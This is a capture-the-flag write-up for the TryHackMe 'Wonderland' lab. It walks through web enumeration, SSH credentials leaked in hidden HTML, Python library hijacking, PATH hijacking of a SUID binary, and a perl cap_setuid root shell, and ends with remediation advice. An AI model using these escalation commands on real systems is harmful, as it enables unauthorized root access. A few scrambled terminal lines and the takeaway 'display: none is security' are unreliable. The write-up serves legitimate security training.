Wonderland (CTF Challenge - THM)
Published
•12 min read
Intro:
Wonderland is a beginner-friendly CTF room on TryHackMe themed around Lewis Carroll's Alice in Wonderland. The challenge walks through a full attack chain — web enumeration, steganography hints, SSH access, Python library hijacking, SUID binary exploitation via PATH manipulation, and Linux capabilities abuse — to escalate from an unprivileged web user all the way to root. Notably, the room reverses the expected flag locations: the user flag lives in /root and the root flag in /home/alice.
Capture the flags
Enter Wonderland and capture the flags.
Answer the questions below
Reconnaisance & Enumeration
nmap -sV -p- IP_Address
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
===============================================================
/img (Status: 301) [Size: 0] [--> img/]
/index.html (Status: 301) [Size: 0] [--> ./]
/index.html (Status: 301) [Size: 0] [--> ./]
/r (Status: 301) [Size: 0] [--> r/]
gobuster dir -u http://IP_Address/img -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
===============================================================
/index.html (Status: 301) [Size: 0] [--> ./]
/index.html (Status: 301) [Size: 0] [--> ./]
gobuster dir -u http://IP_Address/r -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
===============================================================
/a (Status: 301) [Size: 0] [--> a/]
/index.html (Status: 301) [Size: 0] [--> ./]
/index.html (Status: 301) [Size: 0] [--> ./]
gobuster dir -u http://IP_Address/r/a -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
===============================================================
/b (Status: 301) [Size: 0] [--> b/]
/index.html (Status: 301) [Size: 0] [--> ./]
/index.html (Status: 301) [Size: 0] [--> ./]
noticed that the other paths would make up rabbit in full, i.e., http://IP_Address/r/a/b/b/i/t
Details found in recon:
The IP_Address/img has images, and I’m wondering if we should use wget to download the images
alice_door.jpgalice_door.pngwhite_rabbit_1.jpg
the IP_Address/r:
Keep Going.
"Would you tell me, please, which way I ought to go from here?"
IP_Address/r/a
Keep Going.
"That depends a good deal on where you want to get to," said the Cat.
IP_Address/r/a/b
Keep Going.
"I don’t much care where —" said Alice.
IP_Address/r/a/b/b
Keep Going.
"Then it doesn’t matter which way you go," said the Cat.
Image Analysis
wget http://IP_Address/img/alice_door.jpg http://IP_Address/img/alice_door.png http://IP_Address/img/white_rabbit_1.jpg
strings white_rabbit_1.jpg
strings alice_door.jpg
strings alice_door.png
exiftool alice_door.png
ExifTool Version Number : 11.88
File Name : alice_door.png
Directory : .
File Size : 1800 kB
File Modification Date/Time : 2020:06:01 23:23:17+01:00
File Access Date/Time : 2026:03:27 08:14:15+00:00
File Inode Change Date/Time : 2026:03:27 08:13:28+00:00
File Permissions : rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 1962
Image Height : 1942
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
SRGB Rendering : Perceptual
Gamma : 2.2
Pixels Per Unit X : 23622
Pixels Per Unit Y : 23622
Pixel Units : meters
Image Size : 1962x1942
Megapixels : 3.8
exiftool alice_door.jpg
ExifTool Version Number : 11.88
File Name : alice_door.jpg
Directory : .
File Size : 1520 kB
File Modification Date/Time : 2020:05:25 17:34:52+01:00
File Access Date/Time : 2026:03:27 08:14:12+00:00
File Inode Change Date/Time : 2026:03:27 08:13:28+00:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.02
Exif Byte Order : Big-endian (Motorola, MM)
Orientation : Horizontal (normal)
X Resolution : 600
Y Resolution : 600
Resolution Unit : inches
Software : Adobe Photoshop CS3 Macintosh
Modify Date : 2008:01:20 01:49:10
Color Space : Uncalibrated
Exif Image Width : 1962
Exif Image Height : 1942
Compression : JPEG (old-style)
Thumbnail Offset : 332
Thumbnail Length : 12311
Current IPTC Digest : 460cf28926b856dab09c01a1b0a79077
Application Record Version : 2
IPTC Digest : 460cf28926b856dab09c01a1b0a79077
Displayed Units X : inches
Displayed Units Y : inches
Print Style : Centered
Print Position : 0 0
Print Scale : 1
Global Angle : 30
Global Altitude : 30
Copyright Flag : False
URL List :
Slices Group Name : De_Alice's_Abenteuer_im_Wunderland_Carroll_pic_03
Num Slices : 1
Pixel Aspect Ratio : 1
Photoshop Thumbnail : (Binary data 12311 bytes, use -b option to extract)
Has Real Merged Data : Yes
Writer Name : Adobe Photoshop
Reader Name : Adobe Photoshop CS3
Photoshop Quality : 12
Photoshop Format : Progressive
Progressive Scans : 3 Scans
XMP Toolkit : Adobe XMP Core 4.1-c036 46.276720, Mon Feb 19 2007 22:13:43
Create Date : 2008:01:20 01:47:53-05:00
Metadata Date : 2008:01:20 01:49:10-05:00
Creator Tool : Adobe Photoshop CS3 Macintosh
Format : image/jpeg
Color Mode : RGB
History :
Instance ID : uuid:436B87178CC8DC11A35E97C268772518
Native Digest : 256,257,258,259,262,274,277,284,530,531,282,283,296,301,318,319,529,532,306,270,271,272,305,315,33432;75A2F56A7448AE47A140395308BA4302
DCT Encode Version : 100
APP14 Flags 0 : [14]
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 1962
Image Height : 1942
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1962x1942
Megapixels : 3.8
Thumbnail Image : (Binary data 12311 bytes, use -b option to extract)
Obtain the flag in user.txt
Remember the path we found above, checking the site or even running curl http://IP_Address/r/a/b/b/i/t/, we find the SSH user and their password
curl http://IP_Address/r/a/b/b/i/t/
<!DOCTYPE html>
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you\u2019re sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they\u2019re both mad."</p>
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>
wget http://IP_Address/img/white_rabbit_1.jpg
ssh alice@IP_Address
ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25 2020 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice 220 May 25 2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 2020 .bashrc
drwx------ 2 alice alice 4096 May 25 2020 .cache
drwx------ 3 alice alice 4096 May 25 2020 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 2020 .local
-rw-r--r-- 1 alice alice 807 May 25 2020 .profile
-rw------- 1 root root 66 May 25 2020 root.txt
-rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py
alice@wonderland:~$ cat root.txt
cat: root.txt: Permission denied
alice@wonderland:~$ python3 walrus_and_the_carpenter.py
The line was: And shook his heavy head \u2014
The line was: Before his streaming eyes.
The line was: Of cabbages \u2014 and kings \u2014
The line was: "I deeply sympathize."
The line was: To give a hand to each."
The line was: And scrambling to the shore.
The line was: The eldest Oyster looked at him.
The line was: Are very good indeed \u2014
The line was: There were no birds to fly.
The line was: "A pleasant walk, a pleasant talk,
full details of the Python file
cat walrus_and_the_carpenter.py
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright \u2014
And this was odd, because it was
The middle of the night.
The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done \u2014
"It\u2019s very rude of him," she said,
"To come and spoil the fun!"
The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head \u2014
There were no birds to fly.
The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"
"If seven maids with seven mops
Swept it for half a year,
Do you suppose," the Walrus said,
"That they could get it clear?"
"I doubt it," said the Carpenter,
And shed a bitter tear.
"O Oysters, come and walk with us!"
The Walrus did beseech.
"A pleasant walk, a pleasant talk,
Along the briny beach:
We cannot do with more than four,
To give a hand to each."
The eldest Oyster looked at him.
But never a word he said:
The eldest Oyster winked his eye,
And shook his heavy head \u2014
Meaning to say he did not choose
To leave the oyster-bed.
But four young oysters hurried up,
All eager for the treat:
Their coats were brushed, their faces washed,
Their shoes were clean and neat \u2014
And this was odd, because, you know,
They hadn\u2019t any feet.
Four other Oysters followed them,
And yet another four;
And thick and fast they came at last,
And more, and more, and more \u2014
All hopping through the frothy waves,
And scrambling to the shore.
The Walrus and the Carpenter
Walked on a mile or so,
And then they rested on a rock
Conveniently low:
And all the little Oysters stood
And waited in a row.
"The time has come," the Walrus said,
"To talk of many things:
Of shoes \u2014 and ships \u2014 and sealing-wax \u2014
Of cabbages \u2014 and kings \u2014
And why the sea is boiling hot \u2014
And whether pigs have wings."
"But wait a bit," the Oysters cried,
"Before we have our chat;
For some of us are out of breath,
And all of us are fat!"
"No hurry!" said the Carpenter.
They thanked him much for that.
"A loaf of bread," the Walrus said,
"Is what we chiefly need:
Pepper and vinegar besides
Are very good indeed \u2014
Now if you\u2019re ready Oysters dear,
We can begin to feed."
"But not on us!" the Oysters cried,
Turning a little blue,
"After such kindness, that would be
A dismal thing to do!"
"The night is fine," the Walrus said
"Do you admire the view?
"It was so kind of you to come!
And you are very nice!"
The Carpenter said nothing but
"Cut us another slice:
I wish you were not quite so deaf \u2014
I\u2019ve had to ask you twice!"
"It seems a shame," the Walrus said,
"To play them such a trick,
After we\u2019ve brought them out so far,
And made them trot so quick!"
The Carpenter said nothing but
"The butter\u2019s spread too thick!"
"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.
"O Oysters," said the Carpenter.
"You\u2019ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none \u2014
And that was scarcely odd, because
They\u2019d eaten every one."""
for i in range(10):
line = random.choice(poem.split("\n"))
print("The line was:\t", line)
cat > /home/alice/random.py << 'EOF'
import os
import pty
pty.spawn("/bin/bash")
EOF
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
/bin/echo -n 'Probably by ' && date --date='next
Probably by Fri, 27 Mar 2026 10:40:45 +0000
rabbit@wonderland:/home/rabbit$ ls -la /home/rabbit/teaParty
-rwsr-sr-x 1 root root 16816 May 25 2020 /home/rabbit/teaParty
rabbit@wonderland:/home/rabbit$ cd /home/rabbit
rabbit@wonderland:/home/rabbit$
rabbit@wonderland:/home/rabbit$ echo '/bin/bash' > date
rabbit@wonderland:/home/rabbit$ chmod +x date
rabbit@wonderland:/home/rabbit\( export PATH=/home/rabbit:\)PATH
rabbit@wonderland:/home/rabbit$
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ ls -la
total 44
drwxr-x--- 2 rabbit rabbit 4096 Mar 27 09:41 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc
-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile
-rwxr-xr-x 1 rabbit rabbit 10 Mar 27 09:41 date
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
It reveals the password of hatter in an effort to escalate privileges to root eventually
cd /home/hatter
cat password.txt
WhyIsARavenLikeAWritingDesk?
We finally have our user flag:
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
# user flag (it's in /root - this room reverses the flag locations)
cat /root/user.txt
thm{"Curiouser and curiouser!"}
Escalate your privileges, what is the flag in root.txt?
The root flag is in this path:
# root flag (it's in alice's home)
cat /home/alice/root.txt
whoami
hatter
hatter@wonderland:/home/hatter$ id
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
SIX::setuid(0); exec "/bin/bash";'sr/bin/perl5.26.1 -e 'use POSIX qw(setuid); POS
bash: /usr/bin/perl5.26.1: Permission denied
sudo -l
[sudo] password for hatter:
Sorry, user hatter may not run sudo on wonderland.
(0); exec "/bin/bash";'sr/bin/perl5.26.1 -e 'use POSIX qw(setuid); POSIX::setuid(
root@wonderland:~# find / -type f -name root.txt 2>/dev/null
/home/alice/root.txt
root@wonderland:~# cat /home/alice/root.txt
thm{Twinkle, twinkle, little bat! How I wonder what you're at!}
Conclusion:
Key Takeaways:
- Follow the theme — the
/r/a/b/b/i/tpath was hidden in plain sight; the Alice in Wonderland theme was a direct hint at what word to spell out - Hidden HTML elements leak credentials — display: none is security; always curl and read raw source
- Python library hijacking — when a script uses
import randomwithout an absolute path, and you control the working directory, you can drop a maliciousrandom.pyto hijack execution - PATH hijacking with SUID binaries — if a SUID binary calls a command by name (not full path), placing a fake version earlier in
$PATHruns your code with the binary's elevated privileges - Linux capabilities as a privesc vector —
cap_setuidon perl is as good as a SUID binary; always rungetcap -r / 2>/dev/nullin your enumeration checklist - Group context matters — the perl privesc failed until SSHing in directly as hatter to inherit the correct group membership
Remediation:
- Avoid embedding credentials in HTML, even in hidden elements
- Pin library imports using absolute paths or virtual environments in sensitive scripts
- Avoid calling system binaries by name in SUID/capability-enabled programs; use full absolute paths
- Audit Linux capabilities regularly —
cap_setuidon interpreters like Perl or Python should never appear in production
